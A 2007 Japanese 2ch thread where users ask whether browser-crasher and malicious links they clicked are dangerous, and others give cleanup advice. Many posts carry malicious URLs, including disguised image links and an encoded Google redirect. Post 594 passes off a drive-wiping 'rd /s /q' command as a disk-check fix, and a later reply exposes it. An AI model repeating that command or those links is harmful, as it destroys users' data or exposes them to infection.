547名無しさん@お腹いっぱい。:2007/05/26(土) 18:13:55
         ___
        /       ヽ
    , -‐ (_).⌒ l ̄| ⌒ | プギャーーー
     l_j_j_j と) ノ─|  ノ
    /   /       ヽ
    〈  ノ         |
548名無しさん@お腹いっぱい。:2007/05/28(月) 14:59:02
549名無しさん@お腹いっぱい。:2007/05/28(月) 21:28:43
ワンクリか
550名無しさん@お腹いっぱい。:2007/05/29(火) 12:38:44
>>548
最近は動画ファイルナビゲータとか大手のエロサイトにもワンクリック詐欺の
サイトが更新情報の欄に載ってたりするから性質が悪い
そういうサイトって質の悪いつまらないファイルしか置いていないから余計に腹が立つ
551名無しさん@お腹いっぱい。:2007/05/29(火) 15:11:31
【女性客拉致・強姦】 「ペッパーランチ事件」

ニュー速+の記録を更新していまだに継続中。皆が恐れ・疑問を抱いている。
事件発覚以来の報道規制やネット検索エンジンでの排除など、
この事件を闇に葬ろうとする背後の組織力の大きさが不気味だ。

力作まとめフラッシュ
http://helper.futmilk.net/

ニュー速+の人がポスター作ってくれました
http://www.uploda.org/uporg828407.pdf (プロデザイナーさんなどによるブラッシュアップ版。クオリティ高い! PDFだから印刷もきれいにいけそう)
http://www.uploda.org/uporg828401.jpg.html (パス:news プロの人ではないみたいですが、それでもセンス良!)

まとめサイト
http://www22.atwiki.jp/pepper_rape/pages/1.html
552名無しさん@お腹いっぱい。:2007/05/29(火) 17:15:09

でたww妄想中ww
ついにここまで侵食してきたか・・・。
553名無しさん@お腹いっぱい。:2007/05/29(火) 20:40:12
tp://www.ahatena.com
【使用OS】XPsp2
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】 使ってない
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】 シマンテックのオンラインスキャン現在実行中
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 まだ未発症
【何をしたらそんなことになったのか】
【これまでにとった措置】 システムの復元
【その他の質問】 JAVAスクリプトでなんか書いてあるみたいなんだけどなんのことやら。
554名無しさん@お腹いっぱい。:2007/05/29(火) 22:13:35
>>553
ネトゲのアカウントハックを狙ったサイトかな
ブラクラとかかわいい物では無くWindowsの脆弱性を突くなど
純粋に悪意をもって作成された類のサイト

踏んだ時点でWindowsUpdateがきっちり行われていれば
(最低でもMS06-014とMS07-017の脆弱性を塞いでいる事)
感染まではいってないと思う

一応スキャンして何も出なければ完了かな
555名無しさん@お腹いっぱい。:2007/05/30(水) 00:01:14
>>554
おぅ、ありがと〜。
優先度の高い云々はなかったんで大丈夫なのかな。
スキャンしてみたら7つ感染って言われてうち6つはLIve2chの.dat
1つがlocalのIEキャッシュに.curってのがあったんで消してきた。
メモリになけりゃ問題なしなのかな。
あとは一応ネトゲのパス変えてきます、ありがとう。
556名無しさん@お腹いっぱい。:2007/05/31(木) 17:00:11
ここに出てあるサイト全部踏んでみたけど(もちろん仮想OSで)
ほとんどぜんぶがポップアップブロックで防いでくれるんだよな。
もっと強烈なのキボンヌ
557名無しさん@お腹いっぱい。:2007/06/01(金) 21:38:10
仮想じゃなくて、メインで踏めよ。
558名無しさん@お腹いっぱい。:2007/06/04(月) 10:12:30
有給休暇をいただいたので、
内緒で姉のパソコンでインターネットして
いろんなアーティストのサイト見まくっていたのですが、なんと
なにかのひょうしに見ていたサイト画像がパソコンの後ろに
表示されたままになって元に戻せません!
前は山下智久の画像だったのに、今は満面の笑みで写った山下達郎の画像です・・・。。
再起動しても表示されたままなんです。
早く直さないと姉が帰ってきてしまいます!(看護師なので・・・・)
至急助けてください!!!
ここのスレッドの人ならわかるとおもいました。
OSはWindows2000です。
よろしくお願いします。
559名無しさん@お腹いっぱい。:2007/06/04(月) 10:38:11
6 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2007/06/04(月) 10:13:51
有給休暇をいただいたので、
内緒で姉のパソコンでインターネットして
いろんなアーティストのサイト見まくっていたのですが、なんと
なにかのひょうしに見ていたサイト画像がパソコンの後ろに
表示されたままになって元に戻せません!
前は山下智久の画像だったのに、今は満面の笑みで写った山下達郎の画像です・・・。。
再起動しても表示されたままなんです。
早く直さないと姉が帰ってきてしまいます!(看護師なので・・・・)
至急助けてください!!!
ここのスレッドの人ならわかるとおもいました。
OSはWindows98seです。
よろしくお願いします。
560名無しさん@お腹いっぱい。:2007/06/04(月) 15:54:09
後は、XPとVistaか……
561名無しさん@お腹いっぱい。:2007/06/04(月) 19:06:32
おそらく>>4かと思うのですが、踏んでしまいました
tp://up.uppple.com/src/up3411.jpg

PCが青画面になって動かなくなったので、スイッチを長押しして強制終了させました
マカフィーは無反応
無害でしょうか?
開いたブラウザはスレイプニールです
562名無しさん@お腹いっぱい。:2007/06/04(月) 20:46:58
>>561
OSがXPでWindowsUpdateしてあれば(自動更新切っていなければ)
恐らく踏んだだけで感染まではいかない

一応複数のウイルスサイトの呼び出しがあるので
念のため一時ファイル削除して手持ちのソフトでスキャン
不安なら各社のオンラインスキャンなどを試す。何も検出されなければ完了

無償オンラインスキャン|ウィルスチェック Part.2
http://pc11.2ch.net/test/read.cgi/sec/1177784260/
563名無しさん@お腹いっぱい。:2007/06/05(火) 00:17:03
>>562
レス有り難う御座います
OSはXP、自動更新はONにしていますが、念のためにフルスキャンしてみようと思います
564名無しさん@お腹いっぱい。:2007/06/06(水) 20:09:40
565名無しさん@お腹いっぱい。:2007/06/09(土) 03:50:41
>>559
話は看護師のねーちゃんの画像をうpしてからだ
566名無しさん@お腹いっぱい。:2007/06/10(日) 23:32:43
今日あるサイトで四字熟語のゲームをしてましたところ
急に画面に 3333・・・・・と どんどん3が出てきてしまい
Wordを使おうとしても 何をしても3が連発されてしまいます
その上 3はキーボードで打てません
ひらがなで さん と打ってから変換してますが
これってブラクラでしょうか?
初心者なので よろしくお願いします
567名無しさん@お腹いっぱい。:2007/06/10(日) 23:39:46
とりあえずオンラインスキャンしてみれば
ttp://www.trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
568名無しさん@お腹いっぱい。:2007/06/11(月) 01:38:34
キーボードの「3」のキーが潰れてるとか
いや、違うか
569566:2007/06/12(火) 00:23:19
ありがとうございます
とりあえず567さんの言うとおりに
オンラインスキャンというやつをしています
結果またご報告いたします

ただウィルスに関しては2回ほど検出しようと
したのですがウィルス無しと判定されます

それと568さんの言うとおりに
キーボードの 「3」が潰れてるのかとも
思いますが調べる方法もわかりません

それとPCは 
3が連打されるようになってから
何て言うんでしょうか、PCを購入時と同じ設定に
戻していますが 3 が連打されるのです

自分でも頑張ってるのですがわかりませんでした

ご親切なアドバイス ありがとうございました!
570名無しさん@お腹いっぱい。:2007/06/12(火) 02:27:44
キーボードを別のと取り替えるか外して起動してみて、
同じ症状が出るか否かで原因を考えてみる、とか
571名無しさん@お腹いっぱい。:2007/06/13(水) 07:26:32
ttp://hey.chu.jp/up/source3/No_2471.jpgを踏んでしまいました
画像の後にテルネットを起動しますと出たので即閉じたのですが、気になっています
対策法がありましたら教えてください
572名無しさん@お腹いっぱい。:2007/06/13(水) 09:21:02
>>571
>>561とほぼ同じもの。対策は>>562
テルネットに関しては>>3のサイトが含まれている為のものなので
特に気にしなくていい
573571:2007/06/13(水) 14:01:37
>>572
教えていただきどうもありがとうございました
574名無しさん@お腹いっぱい。:2007/06/13(水) 15:15:05
http://anu.s7.x-beat.com/1up/src/up11316.jpg

これを踏んでしまったのですがヤバイでしょうか?
575名無しさん@お腹いっぱい。:2007/06/13(水) 17:47:27
>>574 超ヤバスwケータイブリブリってなるw
576566:2007/06/13(水) 23:19:16
570さん ありがとうございました
PCがノート型なのでキーボード取替え出来ません

567さんの言う通りスキャンしてみましたが
ウィルスは見つかりませんでした

色々ご相談乗っていただきありがとうございました

新しいPCが買えるようになるのがいつになるか
わかりませんが
現れる 3 と戦いながら
何とか使ってみます
577名無しさん@お腹いっぱい。:2007/06/13(水) 23:36:16
USB接続の外付けキーボードをノートにのせて使ってみれば(かっこ悪いけどw)
修理すると万単位だけどこの方法なら千円でできる。
578名無しさん@お腹いっぱい。:2007/06/13(水) 23:52:14
正直、サポートに電話したほうが早いぞ
579名無しさん@お腹いっぱい。:2007/06/14(木) 06:13:34
動画でよくある精神的ブラクラ…今日久しぶりにひっかかった。
雨で暇だったからようつべで遊んでたら韓国ダンサーの失神のあと「ぎゃーーー」
以前は間違い探しサイトでジーとみてたら画面いっぱいに山んばのようなばばあが「どばーーー」
いやになってくるよ・・・くそが
580名無しさん@お腹いっぱい。:2007/06/20(水) 20:03:24
ttp://updas.net/up/download/1182132358.zip/attatch

解凍したところPC内の全データが削除されてしまいました
復元方法があれば教えて下さい。お願いします
581名無しさん@お腹いっぱい。:2007/06/20(水) 20:52:34
該当のファイルは削除されてる

この辺適当に試せ
http://cowscorpion.com/Software/FileRecovery.html
582名無しさん@お腹いっぱい。:2007/06/20(水) 21:06:37
>>581
ありがとうございました
583名無しさん@お腹いっぱい。:2007/06/20(水) 21:07:47
>>580
かおる姫だね。再インスコ→以後全て怪しむ。
584名無しさん@お腹いっぱい。:2007/06/20(水) 21:39:19
>>583
再インスコというのは具体的にどうすればいいのですか?ググってもわかりませんでした
超初心者ですみません(´;ω;`)教えて下さい
585名無しさん@お腹いっぱい。:2007/06/20(水) 22:13:47
>>584
再インストールもしくは再セットアップ。
俺も初心者のとき泣いたもんさ。バックアップ取ってないなら失ったファイルは諦めろ。
586名無しさん@お腹いっぱい。:2007/06/20(水) 22:18:09
>>585
レスありがとうございます
ファイル復元できないのか_| ̄|○
仕事のファイルとか消えてマジ自殺レベルです
587名無しさん@お腹いっぱい。:2007/06/20(水) 22:24:05
懲りたら無料のでもいいから入れとけ

【無料】 フリーセキュリティ の組合せ 3
http://pc11.2ch.net/test/read.cgi/sec/1176377557/
588名無しさん@お腹いっぱい。:2007/06/21(木) 16:20:53
解凍しただけでどうして実行されるのか解説キボン
589名無しさん@お腹いっぱい。:2007/06/21(木) 17:15:59
解凍して「実行した」が抜けてるだけだと思うけどね
入っていたのがかおる姫なら多分アイコン偽装のexeだろう
590名無しさん@お腹いっぱい。:2007/06/21(木) 19:27:42
>>586
OSの再インストールが済んだらいれます。dクス

>>589
すみませんその通りです
「実行した」というのが抜けてました。

いろいろググってみると自分がいかに無知だったか思い知ったよ…
こういうの初めてで勉強になりました。
何とかしてファイル復元できんかな?という希望も捨てることにします。
レスして下さった方々どうもありがとう
591名無しさん@お腹いっぱい。:2007/06/21(木) 23:09:54
アドわかんなくなったけど

ガレッジセールが出てきて激しくパソコンが、ガガッガガガガ
ってなったけど
詳細きぼん
こわくてすぐ消した
592名無しさん@お腹いっぱい。:2007/06/22(金) 01:12:28
これは…
詳細キボン
593名無しさん@お腹いっぱい。:2007/06/22(金) 09:47:10
594名無しさん@お腹いっぱい。:2007/06/22(金) 09:48:55
>>590
チェックディスクコマンドを試してみ。

1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。

上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:

これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
595名無しさん@お腹いっぱい。:2007/06/22(金) 10:35:20
>>594
2番目以降の処理が実行できません。
596名無しさん@お腹いっぱい。:2007/06/22(金) 11:22:53
>>595
Cドライブのデータを全て削除するコマンドだから実行しちゃダメだよ。
ttp://oshiete1.goo.ne.jp/qa2656130.html?ans_count_asc=2
597名無しさん@お腹いっぱい。:2007/06/22(金) 11:44:28
>>596
そうですか・・・
598名無しさん@お腹いっぱい。:2007/06/22(金) 17:59:55
ん?w悔しかったの?
599名無しさん@お腹いっぱい。:2007/06/22(金) 22:05:27
600名無しさん@お腹いっぱい。:2007/06/23(土) 00:46:51
(・・?)
601名無しさん@お腹いっぱい。:2007/06/23(土) 23:23:33
tp://www.subculture.com/backdoor.html

これを踏んでしまいました。
何か問題ありますでしょうか・・?
よろしくお願いします。
602名無しさん@お腹いっぱい。:2007/06/23(土) 23:48:21
このブラクラは?
ttp://fyad.org/ny3w
603名無しさん@お腹いっぱい。:2007/06/24(日) 16:38:20
>>601
ジョークページの一種だけど、ページ内の文字列(LOVE-LETTERうんぬん)に
一部のセキュリティソフトが反応するかもしれない

踏んでウイルス感染とかは無いので、特に対処の必要も無い

>>602
URL短縮サービスを使って、各種ブラクラ+悪意のあるサイトを呼び出すURLに飛ばされる
>>561あたりのものと大体同じ内容
604名無しさん@お腹いっぱい。:2007/06/24(日) 17:25:05
>>603
ありがとうございます。
一安心です。。
605名無しさん@お腹いっぱい。:2007/06/25(月) 15:54:32
タブブラウザ使ってたのにIEの窓がいっぱい出てくるブラクラに踏んでしまいました。
タブブラウザの関連付け、「プログラムの追加と削除]の設定、「インターネットオプション」の[プログラム]にある
[IEの起動時に、通常使用するブラウザを確認する]にもチェックを入れていました。
IEの窓がでるブラクラを防ぐには後、どの設定が必要なんでしょうか?
606名無しさん@お腹いっぱい。:2007/06/25(月) 19:37:50
607名無しさん@お腹いっぱい。:2007/06/25(月) 20:27:06
>>606
※このアドレスは危険URLのひとつです。
注意!アラートオープンを発見! (6)
注意!ループタグを発見! (2)
危険!mailtoストームを発見! (100)
危険!FDDアタックを発見!(24)
危険!無限ループを発見! (2)
危険!ニュースストームを発見! (6)
危険!Telnetストームを発見! (184
608名無しさん@お腹いっぱい。:2007/06/26(火) 03:37:38
>606 ふんじゃったんですが、ウィンドウが沢山開きだして、とりあえず強制終了したのですが
大丈夫でしょうか??
609名無しさん@お腹いっぱい。:2007/06/26(火) 04:47:09
www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=http%3A%2F%2F%77%77%77%2E%68%65%6C%6C%70%6C%61%6E%74%2E%6F%72%67%2Fcgi-bin%2F%78%6F%6F%72%2F%73%65%72%70%65%6E%74%2E%63%67%69&btnI=I%27mFeelingLucky&num=50
これを踏んでしまったのですが大丈夫でしょうか?

【使用OS】Windows XP sp2
【WindowsUpdateしてるか】しています
【AntiVirusは何を使っているか】NAV、AVG
【ちゃんとUpdateしてるか】しています
【スキャンした結果(ウイルス名・発見場所)】感染なし
【別のオンラインスキャンしたならその結果は】カスペルスキーで感染なし
【症状を具体的に、分かる限りすべて書く】
WMPが起動、telnetがアクセス開始、コマンドプロンプトが3つほど起動、メーラーが起動
WMPはすぐに閉じたのでなにがあったのかわかりません。コマンドプロンプトも
焦っていた為、内容確認せずに閉じてしまいました。メーラーはサンダーバードでしたが
ニュースグルーブの登録ダイアログが出てきたので拒否、telnetのアクセスはFWが反応したので拒否しました
【何をしたらそんなことになったのか】
上記URLをクリックしました
【これまでにとった措置】
スパイウェアの検索、ウィルスの検索
【その他の質問】
このまま使用していても大丈夫でしょうか?個人情報やwebサイトのパスワードなどが漏れてないか心配です
610名無しさん@お腹いっぱい。:2007/06/26(火) 05:19:49
>>609
単なる厨房ホイホイ
IP抜き、telnetが少し開いたりするだけ
無害
611名無しさん@お腹いっぱい。:2007/06/26(火) 05:35:42
>>608
>>561-562

>>609
googleの I'm Feeling Luckyオプションを使って>>3のサイトに飛ばされる
実害は無い
612609:2007/06/26(火) 05:41:53
>>610
>>611
ありがとうございます、おかげで安心できました。
初めての経験だったので不安でした。以後気をつけたいと思います。
613名無しさん@お腹いっぱい。:2007/06/26(火) 13:22:02
これでもくらえ
http://bighugecocks.net/
614名無しさん@お腹いっぱい。:2007/06/26(火) 16:29:57
ぐわーやーらーれーたー
615608:2007/06/26(火) 17:52:14
>611
ウィルスチェックしたら、感染していました…
ありがとうございました
616名無しさん@お腹いっぱい。:2007/06/27(水) 08:17:17
厨房ホイホイはウイルスあったっけ
617名無しさん@お腹いっぱい。:2007/06/27(水) 16:30:14
踏んでしまいました・・・かなり危険らしいのですがよろしくお願いします・・・
ttp://www.albinoblacksheep.com/flash/open.html
618名無しさん@お腹いっぱい。:2007/06/27(水) 18:48:48
>>617
全然、こっちのほうが危険だよ!
http://zero.bestmanage3.org/framecj.php?aff_id=5024#movies/part2.mpg
619名無しさん@お腹いっぱい。:2007/06/27(水) 18:51:09
>>617
ジョークフラッシュだからPCに後遺症はないよ。
620名無しさん@お腹いっぱい。:2007/06/27(水) 18:55:38
>>618
ありがとうございます。
ということはあまり被害はないということでいいんでしょうか?
621名無しさん@お腹いっぱい。:2007/06/27(水) 19:04:04
>>620
昔はブラクラURLだったが今は撤去されている
危険って言っている奴がいるのはそのためかと

あまりというか無害という事でいい
622名無しさん@お腹いっぱい。:2007/06/27(水) 20:04:32
>>619
>>621


なるほど。おかげで解決しました!本当にありがとうございました。
623名無しさん@お腹いっぱい。:2007/06/27(水) 21:39:39
www.geocities.jp/itimankakkei
これを踏んでしまった。
ゲーム攻略サイトかと思ったのに
何かPCに害あるんだろうか…
624名無しさん@お腹いっぱい。:2007/06/27(水) 22:31:11
>>622
いえいえ、どういたしまして。
625名無しさん@お腹いっぱい。:2007/06/27(水) 22:40:40
>>623
自分には被害は無い。
Flashがあるだけだが、ttp://wwwww.2ch.net/news4vip/index.html を高速リロードするようだ。
626名無しさん@お腹いっぱい。:2007/06/27(水) 23:55:40
>>625
害は無いのか良かった。
ありがとうございました。
627名無しさん@お腹いっぱい。:2007/06/28(木) 10:26:11
tp://bebe.run.buttobi.net/up/src/be_0794.jpg
専ブラで踏んでしまいました。
画像のキャッシュは削除したのですが実害はあるのでしょうか?
628名無しさん@お腹いっぱい。:2007/06/28(木) 10:47:33
>>627
専ブラといってもjaneかギコか何かわからんが…
janeあたりだと、こういうのはデコードエラーになって
ブラクラの発動は無いとか聞いたが使ってないからわからない
画像プレビューとかもそうだが、踏んでしまってもあくまで「画像」として処理したのであれば実害は無いはず

対象を拡張子の通りhtmlとして開いてしまったら(ブラウザが立ちあがったら)有害
その時は大体FDDがブーブー言ったり何か色々出てきたりするので
見た目で明らかに変なの踏んだと分かるかと思う

中身としては>>561-562あたりと同じ
まぁ変なの踏んじゃったと思うなら、こういう機会にウイルスチェックしておく事をお勧めする
629名無しさん@お腹いっぱい。:2007/06/28(木) 16:11:20
あるブラクラを踏んでしまったかも
ブラクラを踏んで結果的に個人情報が流出することはあるのでしょうか?
見知らぬ土地から電話がきますた 無視しましたが
630名無しさん@お腹いっぱい。:2007/06/28(木) 22:35:06
どの程度の個人情報か知らんけど、ブラクラ踏んで個人情報は漏れないでしょ
ウイルス踏んだなら別だけど
631名無しさん@お腹いっぱい。:2007/06/28(木) 23:23:20
632名無しさん@お腹いっぱい。:2007/06/28(木) 23:24:19
633名無しさん@お腹いっぱい。:2007/06/29(金) 01:07:25
EXP/HTML.WindowBo.G by Avira AntiVir

Opera、Mozilla Firefoxじゃ開けない
例によって標準設定のInternet Explorerだと危険だ
634名無しさん@お腹いっぱい。:2007/06/29(金) 02:42:10
>>632のやつ踏んでしまいました
もう少し詳しく教えていただけませんか?
症状としては、変な画像が出たと思ったらメーラーが勝手に開いて
新しいウィンドウが開く無限地獄になりました
強制終了の後、再起動後は何事もなかったように動いています
恐いので今日はモデム切って寝ます
635名無しさん@お腹いっぱい。:2007/06/29(金) 02:52:09
636名無しさん@お腹いっぱい。:2007/06/30(土) 00:13:30
踏んじまったorz
637名無しさん@お腹いっぱい。:2007/06/30(土) 02:03:54
まぁ、URLが98個有ったんで、全部踏んでみた。
警告はたくさん出たが、ほとんど、JScriptとWindows Updateでパッチが公開されている脆弱性を狙った奴ばかりで、
感染はしなかった。
638名無しさん@お腹いっぱい。:2007/06/30(土) 03:38:50
639名無しさん@お腹いっぱい。:2007/06/30(土) 20:18:38
>>632
Proxomitronが防いでくれた
もっと簡単に使えるならみんなにも薦めるんだが
フィルタを追加してると自分でも分からなくなるんだよな
640名無しさん@お腹いっぱい。:2007/07/04(水) 20:11:30
htmlをjpgに拡張子変更してるだけのブラクラだったら
firefoxやopera使うだけで防げるやん
641名無しさん@お腹いっぱい。:2007/07/04(水) 21:03:50
IEでも拡張子でファイルを開くようにすれば良いだけ
IE信者の人や、初心者にお勧め
ただし、IEの標準設定での表示、動作を前提に作ってあるサイト(糞サイトw)もあるから、
若干の不都合が出ることも覚悟の上で
642MyDoom被害経験者(当時は深刻):2007/07/05(木) 03:13:45
Firefoxでポップアップ防御しているのに
開かれるポップアップって、どんな作り
してんの?
それと、JAVA禁止にしても暴れるブラクラ
もまた然り。
643名無しさん@お腹いっぱい。:2007/07/05(木) 06:34:26
そのブラクラ見ないとわからんけどflash経由とかじゃね?
flashならブラウザの設定でjavascript切ってても
javascript有効になるし、flashは実は危険
644名無しさん@お腹いっぱい。:2007/07/05(木) 12:12:42
>>643
例えて言えばこんな感じかな。
http://smallup.dip.jp/uploader/src/smallup2179.gif
645名無しさん@お腹いっぱい。:2007/07/05(木) 15:08:31
>>644
量が…:(;゙゚'ω゚'):
646名無しさん@お腹いっぱい。:2007/07/05(木) 20:34:14
>643
ならばFLASHのPlug-inを削除してしまえばいいか。
647名無しさん@お腹いっぱい。:2007/07/05(木) 21:17:43
ttp://www.hellplant.org/cgi-bin/xoor/serpent.cgi

恥ずかしながらこれを踏んでしまいました
一体どういう内容のブラクラなのでしょうか?
パソコンになにか影響はありますか?
648名無しさん@お腹いっぱい。:2007/07/05(木) 21:25:34
649名無しさん@お腹いっぱい。:2007/07/05(木) 21:26:50
厨房ホイホイ♪
650名無しさん@お腹いっぱい。:2007/07/06(金) 04:55:47
>>7のテンプレを使用させてもらいます。
使用OS:2000
アップデート:そこそこしている(三ヶ月いないにはしているはず
AntiVirus:Kingsoft antiVirus2006
antiUPdate:去年の10月に無料期間終了→放置
スキャンした結果:2つほど探知→対処に成功とのこと、もう一度スキャンしたら発見出来ず
別のオンラインスキャン:後述

症状:
立ち上がるのが遅い(これは勘違いかも
Windowsでドラッグ&ドロップが出来ない(ドラッグしても半透明のアイコンが移動しない
コピーしても張り付けが出ない(読み込んでない感じ
ネットでクリックしてもページがすすまないものがあるWindowsUpdateとかオンラインスキャンの実行ボタン、2chのスレなど
スレが開けないので専ブラから読んで、書いてます
インターネットエクスプローラを開いても検索出来ない(入力するところが出ない(お気に入りからGoogleは可
コントロールパネルの中身が左に寄る、インターネットエクスプローラで3:7に分けてその左にだけアイコンが出る感じ右はまっ白

原因:ttp://anu.s7.x-beat.com/1up/src/up11316.jpg
を踏みました。
手打ちなので間違っているかもしれません

これまでにとった措置:
スキャン数回、再起動数回 基本的には何もしていません。
その他の質問:どう、したらいいでしょうかよろしければお知恵をお貸しください○| ̄|_
651名無しさん@お腹いっぱい。:2007/07/06(金) 07:52:58
>>650
>>574でも出ているんだが、各種ブラクラと、幾つかの悪意のあるサイトを呼び出す
ざっとリンク先を踏んで見た限り、404や重くてタイムアウトするような海外サイトが多かったりと
そこまで重篤な症状を起こすようには感じなかったのだけど

とりあえず各社のオンラインスキャンなどを試す
http://pc11.2ch.net/test/read.cgi/sec/1177784260/

それも不可能ならリカバリかOS再インストールを勧める
OSのアップデートを(最悪の場合)3ヶ月放置、おまけアンチウイルスもろくでもない状況
ときたら、この程度のもの踏んで感染しても仕方が無い
652名無しさん@お腹いっぱい。:2007/07/08(日) 09:58:27
ttp://down.clubbox.co.kr/happyjazz/nuio3
これをふんでしまいました
何かをインストールするような兆候が見えたので不安になりました
誰か助けてください
お願いします
653名無しさん@お腹いっぱい。:2007/07/08(日) 10:16:39
>>652
マルチいくない
654名無しさん@お腹いっぱい。:2007/07/08(日) 11:58:48
マルチではないんですが
他に聞いてる人がいたのですね
すまんです
655名無しさん@お腹いっぱい。:2007/07/08(日) 16:48:23
>>652
韓国圏のオンラインストレージサイト
サイトからファイルをダウンロードするには、ActiveXコントロールが必要になる
何かをインストールするような兆候というのは、多分それ
Windows(IE)の設定を特に変更していないなら勝手にインストールされる事も無いので
キャンセルしたのなら問題無い

一応ActiveXコントロールの方も取り立てて悪質なプログラムという訳でもないらしい
ttp://www.siteadvisor.com/sites/clubbox.co.kr/downloads/5861252/
落としてVirusTotalにかけたがマルウェア反応は無かった
この先そのサイトを利用するのなら必要なブツなので、自己判断でインスコしてください
656名無しさん@お腹いっぱい。:2007/07/08(日) 22:42:52
>>655
ありがとさんでした
ちょっとガクブルだったので
コレで安心です
657名無しさん@お腹いっぱい。:2007/07/11(水) 02:06:38
踏んだらものすごい画像がでてきて、後のレスでウイルスだといっている人がいました。
なにか危険なものでしょうか。

ttp://up.uppple.com/src/up3411.jpg

すみませんがよろしくおねがいします。
658657:2007/07/11(水) 02:12:13
上の方ですでに出てたんですね。

ですがOSはme でupdateはまったくしてないんです。
マズいでしょうか・・・
659名無しさん@お腹いっぱい。:2007/07/11(水) 03:04:14
まぁ大丈夫だよ、とはとても言えん
正直、素の状態のmeなんぞネットに繋いでいるだけで感染してもおかしくない

一時ファイル削除して適当なアンチウイルスでスキャン
何も出なければそれでよし

それでも不安ならリカバリなりOS再インストールからやるしかない
660名無しさん@お腹いっぱい。:2007/07/11(水) 22:13:30
661名無しさん@お腹いっぱい。:2007/07/11(水) 22:28:44
さっそく二次利用されだしたのか
662ほるもん:2007/07/13(金) 09:59:00
只今踏んじまった!!大佐ァァァアアアアアアアアア!!!!
\(^o^)/
663名無しさん@お腹いっぱい。:2007/07/20(金) 06:00:28
ageますよ
664名無しさん@お腹いっぱい。:2007/07/20(金) 07:17:09
ttp://www.nurs.or.jp/~jisatsu/bbs/bbs.cgi

どうか宜しくお願いします。
665名無しさん@お腹いっぱい。:2007/07/20(金) 08:33:18
IP抜き
666名無しさん@お腹いっぱい。:2007/07/20(金) 08:36:48
>>665
ありがとうございます。
心配する必要ないですか??


666
667名無しさん@お腹いっぱい。:2007/07/20(金) 08:44:53
668名無しさん@お腹いっぱい。:2007/07/20(金) 09:02:37
>>667
>>561-562辺りと大体同じ。各種ブラクラと多数の悪性サイトを呼ぶ
669名無しさん@お腹いっぱい。:2007/07/21(土) 20:15:28
ttp://up.uppple.com/src/up3411.jpg
先程踏んでしまいました…
悪影響あるでしょうか?
670名無しさん@お腹いっぱい。:2007/07/21(土) 22:29:34
671名無しさん@お腹いっぱい。:2007/07/23(月) 01:12:43
ttp://suzukiairi.net/cgi-bin/up/img/puniairi150.jpg
を踏んだんだが俺のPCは一体どうなっちまうんだ…?
672名無しさん@お腹いっぱい。:2007/07/23(月) 01:19:23
ブラウザ経由で踏んだのなら単なるテキストとして処理されるだけなので
アンチウイルスは反応するだろうが、特に対処の必要は無い

気持ち悪いなら一時ファイルの削除程度で十分
673名無しさん@お腹いっぱい。:2007/07/23(月) 01:21:28
McAfee使って突っ込んでみた。

>>671
トロイの木馬 が自動的にブロックされ、削除されました。

詳細
検出: PHP/BackDoor.gen (トロイの木馬)
ファイルパス: C:\Documents and Settings\ *ユーザー名 \Local Settings\Temporary Internet Files\Content.IE5\QZSPE5I5\puniairi150[1].jpg

詳細
トロイの木馬は正規のプログラムを装っていますが、
コンピュータを混乱させたり、被害を与えたり、コンピュータへの不正アクセスを可能にするプログラムです。

コンピュータをスキャンして、その他の脅威が存在しないか確認することをお勧めします。


保護されていない状態で突っ込んだんだったらオンラインスキャンしてみなさいな・・・。
 保護された状態で突っ込んだのなら心配ないけどね。
674名無しさん@お腹いっぱい。:2007/07/23(月) 01:28:07
>>672-673
即レスdです
俺のPCウイルスバスター2007のお試し使ってて隔離できませんした。手動で
削除してくださいって出てきたんだけどどうやって削除すればいいんでしょうか…?
後これは個人情報漏れたんですかね?
675名無しさん@お腹いっぱい。:2007/07/23(月) 01:38:57
>>674
ローカルディスク (C:)に入って→ツール(T)→フォルダ オプション(O)... →表示→
すべてのファイルとフォルダを表示するにチェック(隠しファイルおよび隠しフォルダを表示しないの上)→
保護されたオペレーティング システム ファイルを表示しない (推奨)のチェックを外す→適用(A)→OK→
C:\Documents and Settings\ *ユーザー名 \Local Settings\Temporary Internet Files\Content.IE5\QZSPE5I5に行って→
puniairi150.jpgを削除するか
検索(S)でファイル検索(puniairi150.jpg)して探すか
676名無しさん@お腹いっぱい。:2007/07/23(月) 01:50:41
>>674
IEなら「ツール」→「インターネット オプション」→インターネット一時ファイル「ファイルの削除」
「すべてのオフライン コンテンツを削除する」にチェック→「OK」
まぁ「インターネット一時ファイルの削除」でググってくれ

実行したらアンチウイルスで再度スキャン。何も出なければ完了
677名無しさん@お腹いっぱい。:2007/07/23(月) 02:32:31
>>675-676
本当にありがとうございます!
検索でウイルス引っかからないし他スレでも調べましたがそんな怖いものでも無いみたいだし安心しました…
678名無しさん@お腹いっぱい。:2007/07/25(水) 00:51:33
goggleのブラクラを踏んだんですが危険ですか?
なんにもおきませんでした。

マックです。
679名無しさん@お腹いっぱい。:2007/07/25(水) 01:04:31
>>678
マックで踏んだの?可愛そうに・・・・終了です。
680名無しさん@お腹いっぱい。:2007/07/25(水) 04:31:35
681名無しさん@お腹いっぱい。:2007/07/25(水) 07:39:28
>>680
すいません。ありがとうございます。
682名無しさん@お腹いっぱい。:2007/07/30(月) 12:37:14
683名無しさん@お腹いっぱい。:2007/07/30(月) 14:02:39
>>682
有害。

McAfee SiteAdvisor の Web 安全性評価(キャプチャー画像
ttp://www7.uploader.jp/dl/maru/maru_uljp00005.jpg.html
684名無しさん@お腹いっぱい。:2007/07/30(月) 20:13:12
tp://monoganac.sakura.ne.jp/src/emergency4064.jpg

これはPCに実害があるのでしょうか
奥菜恵の写真が出てoutlookなどが起動したんですが
685名無しさん@お腹いっぱい。:2007/07/30(月) 20:47:44
>>684
>>561-562辺りと似たような感じ
内容は多少違うが、複数のブラクラサイト、ウイルスサイトの呼び出し

WindowsUpdateを怠ってなければ感染はまではいかないと思うが
心配なら一時ファイル削除して適当なウイルスキャン
何も検出されなければ完了
